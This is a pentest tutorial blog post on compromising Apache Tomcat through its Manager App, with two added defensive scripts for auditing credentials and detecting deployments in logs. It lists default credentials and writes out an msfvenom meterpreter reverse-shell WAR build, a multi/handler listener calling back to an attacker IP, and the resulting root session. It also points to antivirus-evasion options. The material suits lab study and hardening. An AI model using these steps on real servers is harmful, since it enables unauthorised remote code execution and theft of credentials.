White Box Testing Tomcat and Struts

Tomcat is always an easy target and low-hanging fruit in a pentest, and I always aim to scan the network for port 8080, as Tomcat runs on this port by default.
If you are lucky enough, you can log in to the “Manager App” with default credentials and upload a .war file to get a shell on the machine.
Pentesting is about having a methodology and knowing your way around. If you successfully own a machine, make sure to collect some more passwords from it.

In this post, I will install Tomcat on my Ubuntu machine, check for possible attack vectors, and review the configuration files.

There may also be a Struts application installed, and it may be vulnerable as well.
Please see the link here to install Tomcat and Struts on Ubuntu.

Please note that the locations may vary depending on where you install. In my case the Tomcat installation can be found here:

/usr/local/tomcat

After the installation is complete, let’s dig into some config files:

/usr/local/tomcat/conf/

The default port of Tomcat can be found in:

/usr/local/tomcat/conf/server.xml

In order to find the config file that sets the default port, you may simply grep for “8080”:

low@vm:/usr/local/tomcat/conf$ grep -rnw . -e "8080"
./server.xml:67: Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
./server.xml:69: <Connector port="8080" protocol="HTTP/1.1"
./server.xml:75: port="8080" protocol="HTTP/1.1"
low@vm:/usr/local/tomcat/conf$

Alright, since it is running on port 8080, let’s check what the service looks like in the nmap output:

root@kali:~# nmap -p 8080 -sV 192.168.207.178
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-16 03:31 EST
Nmap scan report for 192.168.207.178
Host is up (0.00074s latency).

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat 9.0.0.M26
MAC Address: X.X.X.X

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
root@kali:~#

Let’s send a request to port 8080 to verify that Tomcat is up and serving:

root@kali:~# curl http://192.168.207.178:8080/ | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11236 0 11236 0 0 1219k 0 --:--:-- --:--:-- --:--:-- 1219k

Home Documentation Configuration Examples Wiki Mailing_Lists Find_Help
****** Apache Tomcat/9.0.0.M26 ******
***** If you're seeing this, you've successfully installed Tomcat.
Congratulations! *****

...SNIP...

The most interesting part of Tomcat is that you can find credentials in the tomcat-users.xml config file. Imagine you get access to a machine and see that Tomcat is listening only on the loopback interface: you can simply go and grab the plaintext passwords from that file.

The structure is similar to Jenkins, as the credentials for both applications are stored in .xml files. For more information, please see the Jenkins post here.

low@vm:/usr/local/tomcat/conf$ cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
...SNIP...
<role rolename="manager-gui" />
<user username="admin" password="admin" roles="manager-gui,tomcat,admin-gui"/>
...SNIP...
low@vm:/usr/local/tomcat/conf$

The username and password are easily spotted: admin/admin.
For more information regarding roles in Tomcat, please see the Tomcat 9 documentation here.

The password can be used to access the “Manager App”. As soon as you click “Manager App”, you will be asked for credentials; the HTTP response is 401.
If you fuzz the application for additional directories and hit the manager directory, http://192.168.207.178:8080/manager/html, you will get the same 401 error.

Key Directories of Tomcat

/manager
/manager/status

Default credentials

tomcat:tomcat
tomcat:s3cret
admin:admin
admin:
admin:password
tomcat:tomcat1
manager:manager
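Since tomcat-users.xml stores credentials in plaintext and the default pairs above are well known, a defender can audit the file directly. The following script is an added example (not from the original post): it parses a constructed tomcat-users.xml, flags users whose username/password match the default list above, users with an empty password, and users holding Manager or Host Manager roles. The sample XML and the privileged-role set are assumptions for the example.

```python
"""Audit a Tomcat tomcat-users.xml for default credentials and privileged roles.
Added example, not from the original post; the sample XML below is constructed."""
import xml.etree.ElementTree as ET

# Default username/password pairs listed in the post.
DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"), ("admin", ""),
    ("admin", "password"), ("tomcat", "tomcat1"), ("manager", "manager"),
}
# Roles that grant access to the Manager / Host Manager interfaces (assumed set).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed sample in the layout Tomcat 9 ships (namespaced root element).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,tomcat,admin-gui"/>
  <user username="deploy" password="Xk9-Long-Random-Pass" roles="manager-script"/>
  <user username="guest" password="" roles="tomcat"/>
</tomcat-users>"""

def local(tag):
    """Strip the XML namespace Tomcat puts on tomcat-users.xml elements."""
    return tag.rsplit("}", 1)[-1]

def audit(xml_text):
    """Return a list of (username, finding) tuples for risky user entries."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Tomcat accepts either "username" or "name" for the user attribute.
        name = el.get("username", "") or el.get("name", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, pw) in DEFAULT_CREDS:
            findings.append((name, "default credential pair"))
        elif pw == "":
            findings.append((name, "empty password"))
        priv = sorted(roles & PRIVILEGED_ROLES)
        if priv:
            findings.append((name, "privileged roles: " + ",".join(priv)))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_XML):
        print(f"{user}: {finding}")
```

Run it against a real file with `audit(open("/usr/local/tomcat/conf/tomcat-users.xml").read())`; any "default credential pair" or "empty password" finding on a user with privileged roles is exactly the condition the rest of this post exploits.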

Exploiting Apache Tomcat

We are in if the Tomcat administrator uses default credentials.
You will see a page like this:

How to Deploy .war File to Tomcat

You can deploy malicious .war files either by providing a URL or simply by uploading the file from your local machine.
Using our Kali Linux machine, we can easily generate a .war file with the help of msfvenom. We will upload this file and get a reverse shell from Tomcat.

Our Kali (attacking) IP is 192.168.207.176:

root@kali:~# msfvenom -p java/meterpreter/reverse_tcp -f war -e x86/shikata_ga_nai LHOST=192.168.207.176 LPORT=443 -o shell.war

You may also try the java/meterpreter/reverse_https payload, which can help bypass some security configurations.

Here is a good write-up on evading antivirus as well.

Let’s start the listener for the shell:

root@kali:~/Desktop# msfconsole -q -x 'use multi/handler;
> set PAYLOAD java/meterpreter/reverse_tcp;
> set LHOST 192.168.207.176;
> set LPORT 443;
> run'

As soon as you deploy shell.war, you should see it under the Applications section of the Tomcat interface.

Once you click /shell, you receive a meterpreter shell; alternatively, you can simply use curl. Both do the same trick and give us our lovely shell.

root@kali:~# curl http://192.168.207.178:8080/shell

Getting Shell

PAYLOAD => java/meterpreter/reverse_tcp
LHOST => 192.168.207.176
LPORT => 443
[*] Started reverse TCP handler on 192.168.207.176:443
[*] Sending stage (53845 bytes) to 192.168.207.178
[*] Meterpreter session 1 opened (192.168.207.176:443 -> 192.168.207.178:47278) at 2018-11-16 08:07:39 -0500

meterpreter > getuid
Server username: root
meterpreter >
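The deployment above leaves a trace in Tomcat's access log: a successful upload or deploy request to the Manager application, followed by the first request to the new context. The following script is an added example (not from the original post) that scans log lines in Tomcat's default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b) and raises an alert for every successful deploy request, rating it high when the source host is not in an assumed administrator allowlist. The log lines, the ADMIN_HOSTS set, and the severity labels are constructed for the example.

```python
"""Flag Tomcat Manager deployments in a Tomcat access log (default "common" pattern).
Added example, not from the original post; the log lines below are constructed."""
import re

# Default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Manager endpoints that deploy a new web application (HTML GUI upload, text and legacy deploy).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")
# Hosts expected to administer Tomcat; anything else deploying is suspicious (assumed value).
ADMIN_HOSTS = {"127.0.0.1"}

SAMPLE_LOG = """\
192.168.207.176 - - [16/Nov/2018:08:06:58 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.207.176 - admin [16/Nov/2018:08:07:02 -0500] "GET /manager/html HTTP/1.1" 200 17423
192.168.207.176 - admin [16/Nov/2018:08:07:30 -0500] "POST /manager/html/upload HTTP/1.1" 200 16250
192.168.207.176 - - [16/Nov/2018:08:07:39 -0500] "GET /shell HTTP/1.1" 200 -
127.0.0.1 - admin [16/Nov/2018:09:00:00 -0500] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 45
"""

def find_deployments(log_text):
    """Return alerts for successful deploy requests: who, from where, and to what."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected pattern; skip rather than crash
        path = m["path"].split("?", 1)[0]  # drop query string before matching
        if path not in DEPLOY_PATHS or not m["status"].startswith("2"):
            continue  # only successful deploys matter; 401s are failed logins
        alerts.append({
            "time": m["time"], "host": m["host"], "user": m["user"],
            "method": m["method"], "path": m["path"],
            "severity": "high" if m["host"] not in ADMIN_HOSTS else "info",
        })
    return alerts

if __name__ == "__main__":
    for a in find_deployments(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['time']} {a['user']}@{a['host']} {a['method']} {a['path']}")
```

The same log also shows the failed 401 attempts before the login succeeded, which is the signal to watch for default-credential guessing against /manager/html.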

That’s really bad, as we installed Tomcat as the root user 🙁
But we got a shell as root, isn’t that nice? 🙂

I therefore do not recommend installing Tomcat as root, and always try to use more complex passwords for your applications. Never ever use default credentials.

Keep following; I will attack Struts and update the post here.
